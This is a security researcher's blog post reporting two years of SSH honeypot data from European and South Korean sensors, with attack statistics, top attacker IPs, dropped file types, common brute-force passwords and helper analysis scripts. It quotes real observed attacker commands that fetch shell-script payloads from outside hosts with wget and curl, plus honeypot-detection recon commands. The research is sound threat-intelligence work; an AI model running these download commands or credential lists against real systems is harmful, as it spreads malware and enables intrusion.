Adam Orton
7 min read · Apr 2, 2018

Working in the security industry in the wake of APT1 and the subsequent slew of attack groups making headlines over the last few years, I began to wonder whether countries like China and Russia really were trying to hack absolutely everyone, and an idea was born:

Set up a host of interactive honeypots on different continents, log all the things, wait a few years and let the data speak for itself.

Starting in late 2015, the original plan was to set up sensors around the world, including China, Russia, America and Europe, but alas, getting public IP space inside China without an ICP license is somewhat tricky.

In the end, the project had two sensors generating sizeable datasets; one in Europe (OVH Roubaix) and one in South Korea (StarryDNS Seoul). Both have been operational since late 2015 and are running the excellent Cowrie SSH honeypot application written by Michel Oosterhof.

The setup is pretty straightforward. Both sensors listen on TCP/22, log to JSON and use Logstash Lumberjack to forward directly into a central Elasticsearch cluster. Maintaining and watering Elastic between major releases over two years was testing at times, but since upgrading to Elastic 6.2, things are way more stable and the latest Kibana has some awesome visualisation tools courtesy of the Vega framework, including Sankey graphs.

First, some high-level stats on the overall dataset:

  • 16,883,139 unique events collected
  • 8,708,143 from European sensor
  • 8,175,000 from South Korean sensor
  • 3,269,806 failed logins
  • 116,125 successful logins
  • 114,087 commands entered
  • 8,222 files downloaded
  • 1,571 files uploaded
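Totals like these can be rebuilt from the raw sensor logs as well as from Elasticsearch. The following is a minimal sketch, assuming one JSON object per line with an `eventid` field such as `cowrie.login.failed`; the sample records and IP addresses are made up for illustration and are not sensor data.

```python
import json
from collections import Counter


def count_event_types(lines):
    """Tally events by their `eventid` field, skipping lines that are not JSON objects."""
    counts = Counter()
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # truncated or corrupt record
        if isinstance(event, dict):
            counts[event.get("eventid", "unknown")] += 1
    return counts


# Made-up sample records using documentation IP ranges, not real sensor data.
sample_lines = [
    '{"eventid": "cowrie.login.failed", "src_ip": "192.0.2.10", "username": "root", "password": "123456"}',
    '{"eventid": "cowrie.login.failed", "src_ip": "192.0.2.11", "username": "admin", "password": "admin"}',
    '{"eventid": "cowrie.login.success", "src_ip": "198.51.100.7", "username": "root", "password": "root"}',
    '{"eventid": "cowrie.command.input", "src_ip": "198.51.100.7", "input": "whoami"}',
    "not json at all",
]

event_counts = count_event_types(sample_lines)
for event_id, total in event_counts.most_common():
    print(f"{total:>6}  {event_id}")
```

The function accepts any iterable of lines, so an open log file handle can be passed in directly instead of the sample list.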

All events were geo-IP tagged to allow tracking of attacker trends. The tables below show the top 10 source countries that hit each sensor:

Europe

South Korea

The most alarming observation from the raw data is the extremely high number of events originating from China against the sensor in South Korea, compared with the European sensor, with almost ten times as many events observed.

The high number of events from the Netherlands and Russia against the European sensor was primarily generated by direct TCP forwarding events during a prolonged period of use as an open proxy. Forwarding was later disabled in the Cowrie configuration to suppress noise and stop the sensor IP being reported.

Worst Offenders

The top ten source IP addresses per sensor are given below:

South Korea

221.229.172.97 - Chinanet - Nanjing
116.31.116.25 - Chinanet - Shenzhen
116.31.116.24 - Chinanet - Shenzhen
116.31.116.23 - Chinanet - Shenzhen
69.60.116.97 - Infolink Global - Miami
91.195.103.182 - CJSC Metrostandart - Prague
221.229.172.102 - Chinanet - Nanjing
58.218.198.156 - Chinanet - Nanjing
58.218.198.172 - Chinanet - Nanjing
195.66.188.50 - Crnogorski Telekom a.d.Podgorica - Montenegro

As noted from the total event counts, the majority of IP addresses hitting this box were located in mainland China, with a noticeable effort by the group loosely known as “ChinaZ”. This sensor also ran the Dionaea honeypot application alongside Cowrie for a while, and similar IP ranges were seen hitting it on SMB, FTP, HTTP and other common ports with the various exploits of the time (Shellshock, Heartbleed, etc.).

Europe

5.45.84.74 - Serverius Holding - Netherlands
197.96.172.66 - IS - Johannesburg
5.45.84.76 - Serverius Holding - Netherlands
91.230.47.81 - Regionalnaya Kompaniya Svyazi Ltd. - Dublin
91.230.47.82 - Regionalnaya Kompaniya Svyazi Ltd. - Dublin
91.195.103.182 - CJSC Metrostandart - Prague
91.195.103.188 - CJSC Metrostandart - Prague
91.195.103.183 - CJSC Metrostandart - Prague
194.88.106.181 - WorldStream - Netherlands
91.195.103.185 - CJSC Metrostandart - Prague

The European results were heavily skewed by persistent abuse of the Cowrie TCP forwarding function by the 91.195.X.X range which, based on some metadata leakage showing large amounts of traffic to Yandex and Mail.ru, was likely originating from the Russian Federation.
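Clusters like the 91.195.X.X range stand out more when source addresses are grouped by network prefix rather than listed one by one. Here is a rough sketch using the European top ten from above; the /24 prefix length is an arbitrary choice for illustration, and the counts are numbers of addresses in the list, not event volumes.

```python
import ipaddress
from collections import Counter


def count_by_prefix(source_ips, prefix_len=24):
    """Count how many of the given IPv4 addresses fall into each network of size prefix_len."""
    counts = Counter()
    for ip in source_ips:
        # strict=False lets us pass a host address and get its enclosing network back
        network = ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False)
        counts[str(network)] += 1
    return counts


# The ten European source addresses listed above.
europe_top_ten = [
    "5.45.84.74", "197.96.172.66", "5.45.84.76", "91.230.47.81", "91.230.47.82",
    "91.195.103.182", "91.195.103.188", "91.195.103.183", "194.88.106.181",
    "91.195.103.185",
]

prefix_counts = count_by_prefix(europe_top_ten)
for network, total in prefix_counts.most_common():
    print(f"{network:<20} {total}")
```

On this list, `91.195.103.0/24` accounts for four of the ten addresses, with `5.45.84.0/24` and `91.230.47.0/24` contributing two each.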

Downloaded Files

Tracking file downloads to the honeypots via curl, wget and similar tools, the following were the most frequently seen download commands:

wget http://185.165.29.125/bins.sh
curl -O http://198.167.140.29/gtop.sh
wget http://198.167.140.29/gtop.sh
wget http://77.247.178.189/bins.sh
wget http://208.67.1.42/bins.sh
wget http://185.148.39.193/bins.sh
wget http://107.174.34.70/Swag.sh
wget http://198.167.140.29/bins.sh
curl -O http://catsmeowalot.com/lmao.sh
wget http://catsmeowalot.com/lmao.sh
curl -O http://109.236.88.125/bins.sh
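A list like this can be reduced to hosting servers and script names with a small parser. The sketch below is one way to do it, assuming the commands are available as plain strings; the helper names are hypothetical and it only handles simple `wget`/`curl` invocations, not every shell construct an attacker might use.

```python
import shlex
from collections import Counter
from urllib.parse import urlparse

DOWNLOADERS = {"wget", "curl"}
URL_SCHEMES = ("http://", "https://", "ftp://")


def extract_download_urls(command):
    """Return URLs found in a command line that invokes wget or curl."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()  # unbalanced quotes: fall back to whitespace splitting
    tokens = [token.rstrip(";") for token in tokens]
    if not DOWNLOADERS.intersection(tokens):
        return []
    return [token for token in tokens if token.startswith(URL_SCHEMES)]


def tally_downloads(commands):
    """Count download URLs by host and by file name."""
    hosts, file_names = Counter(), Counter()
    for command in commands:
        for url in extract_download_urls(command):
            parsed = urlparse(url)
            hosts[parsed.hostname] += 1
            file_names[parsed.path.rsplit("/", 1)[-1]] += 1
    return hosts, file_names


# The commands listed above, as logged.
observed = [
    "wget http://185.165.29.125/bins.sh",
    "curl -O http://198.167.140.29/gtop.sh",
    "wget http://198.167.140.29/gtop.sh",
    "wget http://77.247.178.189/bins.sh",
    "wget http://208.67.1.42/bins.sh",
    "wget http://185.148.39.193/bins.sh",
    "wget http://107.174.34.70/Swag.sh",
    "wget http://198.167.140.29/bins.sh",
    "curl -O http://catsmeowalot.com/lmao.sh",
    "wget http://catsmeowalot.com/lmao.sh",
    "curl -O http://109.236.88.125/bins.sh",
]

hosts, file_names = tally_downloads(observed)
print(hosts.most_common(3))
print(file_names.most_common())
```

Grouped this way, `bins.sh` appears in six of the eleven commands and `198.167.140.29` serves three of them.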

HFS, an interlude

Over the duration of this experiment (and with my day job as a security researcher/threat hunter), I often carried out mock investigations on things hitting the sensors and had great success finding additional payloads, especially when the actors involved were originating from South-East Asia.

HFS is an HTTP file server that seems to be extremely popular with Chinese threat actors. Often, by simply dropping the file name from the URI and visiting the sub-directory serving it, one can find additional malware and scripts.
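The "drop the file name" step is easy to express in code. This is a small sketch of just the URL manipulation, with no network access; the function name is hypothetical and the example address comes from a documentation IP range rather than a real server.

```python
import posixpath
from urllib.parse import urlsplit, urlunsplit


def parent_directory_url(url):
    """Strip the file name (and any query or fragment) so the URL points at its directory."""
    parts = urlsplit(url)
    directory = posixpath.dirname(parts.path)
    if not directory.endswith("/"):
        directory += "/"
    return urlunsplit((parts.scheme, parts.netloc, directory, "", ""))


# Illustrative URL only; 192.0.2.0/24 is reserved for documentation.
print(parent_directory_url("http://192.0.2.50/payloads/bins.sh"))
```

For the example above this prints `http://192.0.2.50/payloads/`, the directory one would then browse by hand.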

HFS also has a handy archive feature that will Tar archive all the files on the web server if configured (most are). I wrote a small script to go and pull these archives via a SOCKS proxy. The original aim was to extend Cowrie to effectively check for HFS downloads and do this automatically, but this is still on the rainy-day list.

Dropped File Types

In the early days, a lot of the stuff that was dropped came from Romanian IP ranges trying to install Counter-Strike: GO servers or super-retro Perl IRC bots. The CS:GO activity has since abated, but there are still a bunch of folks dropping Perl IRC bots with reasonable frequency. As with HFS, you can have a lot of fun with IRC bots and, judging by bot numbers in some of the channels, they are doing pretty well. That is left as an exercise for the reader though!

Based on the Linux file command output, the following unique file types were observed across the sensors during their operation:

ASCII text
PE32 executable (GUI) Intel 80386
very short file (no magic)
assembler source
Bourne-Again shell script
broken XHTML document text (version 1.0)
C source
C++ source
Composite Document File V2 Document
data
ELF 32-bit LSB executable
ELF 32-bit LSB relocatable
ELF 32-bit MSB executable
ELF 64-bit LSB executable
ELF 64-bit LSB shared object
FORTRAN program
gzip compressed data
HTML document
ISO-8859 text
makefile script
Perl script
PHP script
POSIX shell script
POSIX tar archive
python 2.4 byte-compiled
python 2.6 byte-compiled
python 2.7 byte-compiled
Python script
tar archive
troff or preprocessor input
UTF-8 Unicode text
Zip archive data

By far, the most popular file type was the ELF 32-bit LSB executable, with the most popular malware family being the “BillGates” DDoS framework as described here.
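The ELF variants in the list above differ only in a few header bytes, which is what the file command reads. As a simplified illustration (this is not how the stats here were produced, and it covers far less than `file` does), the word size, byte order and object type can be pulled from the first 18 bytes of a sample:

```python
ELF_MAGIC = b"\x7fELF"
ELF_CLASSES = {1: "32-bit", 2: "64-bit"}          # e_ident[EI_CLASS], byte 4
ELF_BYTE_ORDERS = {1: "LSB", 2: "MSB"}            # e_ident[EI_DATA], byte 5
ELF_TYPES = {1: "relocatable", 2: "executable", 3: "shared object", 4: "core file"}


def describe_elf(header):
    """Return a short description of an ELF header, or None if the bytes are not ELF."""
    if len(header) < 18 or header[:4] != ELF_MAGIC:
        return None
    word_size = ELF_CLASSES.get(header[4], "unknown class")
    byte_order = ELF_BYTE_ORDERS.get(header[5], "unknown byte order")
    # e_type is a 2-byte field at offset 16, stored in the file's own byte order
    endianness = "little" if header[5] == 1 else "big"
    object_type = ELF_TYPES.get(int.from_bytes(header[16:18], endianness), "unknown type")
    return f"ELF {word_size} {byte_order} {object_type}"


# Hand-built 18-byte header for demonstration: 32-bit, little-endian, executable.
demo_header = ELF_MAGIC + bytes([1, 1, 1]) + bytes(9) + (2).to_bytes(2, "little")
print(describe_elf(demo_header))
```

In practice the header would come from reading the first bytes of a captured file opened in binary mode.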

A full list of SHA-256 hashes observed from both sensors can be downloaded here and here.
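For anyone wanting to compare their own captures against such hash lists, a SHA-256 digest can be computed with the Python standard library. This is a generic sketch rather than the tooling used for this project; the function name and chunk size are arbitrary choices.

```python
import hashlib


def sha256_of_file(path, chunk_size=65536):
    """Hash a file in chunks so large samples do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

The returned hex string can be checked against a list with a simple set membership test.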

Bots vs. PEBCAC

Another fun pastime was reviewing the TTY logs of the longer sessions to try and find hands-on-keyboard activity amongst the plethora of bots that permanently scan and exploit the whole internet.

For those familiar with running SSH honeypots, it’s usually pretty easy to tell real people from bots, as the first set of commands humans will likely run are checks to try and weed out whether they are in a honeypot or not. In fact, Shodan even has a handy “Honeypot or Not?” service to assist with this.

Most smart attackers will at least check:

  • /proc/cpuinfo
  • free -m
  • ifconfig
  • whoami
  • hostname
  • df -kh

The reason for this is that Cowrie and Kippo ship with a bunch of default responses to the above and it’s not too hard to spot these once you know what to look for. If the ifconfig result doesn’t return the IP you just exploited, something is obviously up, right? Smart honeypot owners tweak the above (and more!) to make the environment both convincing and safe.
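The same checklist can be turned around and used to triage sessions for review. The sketch below flags sessions that run several of the checks listed above; the threshold of three is an arbitrary assumption, and since some bots run these commands too, it is a rough filter for picking TTY logs to read rather than a reliable human detector.

```python
import re

# The checks listed above, reduced to the command or path that identifies each one.
RECON_MARKERS = ("/proc/cpuinfo", "free", "ifconfig", "whoami", "hostname", "df")


def recon_checks(commands):
    """Return the set of recon markers that appear in a session's commands."""
    seen = set()
    for command in commands:
        # Split on whitespace and common shell separators so "whoami;" still matches
        tokens = set(re.split(r"[\s;|&]+", command))
        for marker in RECON_MARKERS:
            if marker in tokens:
                seen.add(marker)
    return seen


def looks_hands_on(commands, threshold=3):
    """Flag a session that runs at least `threshold` distinct environment checks."""
    return len(recon_checks(commands)) >= threshold


# Two made-up sessions for illustration.
careful_session = ["cat /proc/cpuinfo", "free -m", "ifconfig", "whoami"]
bot_session = ["cd /tmp; wget http://192.0.2.1/bins.sh", "sh bins.sh"]

print(looks_hands_on(careful_session))
print(looks_hands_on(bot_session))
```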

With a bit of fine-tuning, it’s pretty easy to fool attackers, after which they proceed to do all sorts of weird and wonderful stuff. Repeated spelling fails followed by terminal ranting is a personal favourite to watch.

Popular Users/Passwords

For me, these stats are less useful (anyone using these passwords for real is asking for a breach), but the password attempts logged were generally the same between the two sensors with no regionally specific bias.
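One way to put a number on "generally the same" is to compare the top-N password sets from each sensor. The following sketch uses Jaccard similarity (shared entries divided by total distinct entries); the event dictionaries are made-up stand-ins for login records with a `password` field, not real sensor data.

```python
from collections import Counter


def top_values(events, field, n):
    """Return the n most common values of `field` across the given events."""
    counts = Counter(event[field] for event in events if field in event)
    return [value for value, _ in counts.most_common(n)]


def jaccard(first, second):
    """Jaccard similarity of two collections: 1.0 means identical sets, 0.0 means disjoint."""
    first, second = set(first), set(second)
    if not first and not second:
        return 1.0
    return len(first & second) / len(first | second)


# Made-up login attempts for illustration only.
europe_logins = [{"password": p} for p in ["123456", "123456", "password", "admin"]]
korea_logins = [{"password": p} for p in ["123456", "password", "password", "ubnt"]]

europe_top = top_values(europe_logins, "password", 3)
korea_top = top_values(korea_logins, "password", 3)
overlap = jaccard(europe_top, korea_top)
print(f"overlap of top-3 passwords: {overlap:.2f}")
```

A score near 1.0 across a larger N would support the observation that there is no regional bias in the credentials being tried.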

The top twenty passwords seen over the two-year period were:

123456
password
admin
1234
root
12345
ubnt
111111
123
support
test
admin123
default
0
user
0
admin1234
admin1
system
1

The top ten usernames used in authentication attempts were:

root
admin
test
user
oracle
support
ubnt
guest
git
nagios

In conclusion and looking forward

Running SSH honeypots is cheap, fun to do, easy to set up and can generate some genuinely insightful telemetry. Feeding and watering multiple sensors over a longer time period can be challenging as a hobbyist, but is worth the intelligence gain.

In terms of what was achieved and the success of the original idea, I think it is clear that targeting IS significantly different depending on the geo-location of the sensors used. This needs more in-depth data analysis before drawing any solid conclusions.

SSH honeypots are good but, for me, too susceptible to auto-bots and amateur hackers to keep them interesting in future. I have some plans for running a stable of high-interaction RDP honey servers, complete with honey documents, session recording to video and a bunch of other cool things that I suspect might generate more targeted and revealing attacker TTPs, but that’s one for another day.

I can haz data?

I have around 10GB of raw session data and downloaded files from the two sensors discussed here. If anybody has an interest in it beyond the hash lists and the stats here, you can get in touch via Twitter.

Adam Orton

Security researcher and APT hunter by day, amateur malware researcher and bad coder by night. All opinions are my own and not the views of my employer.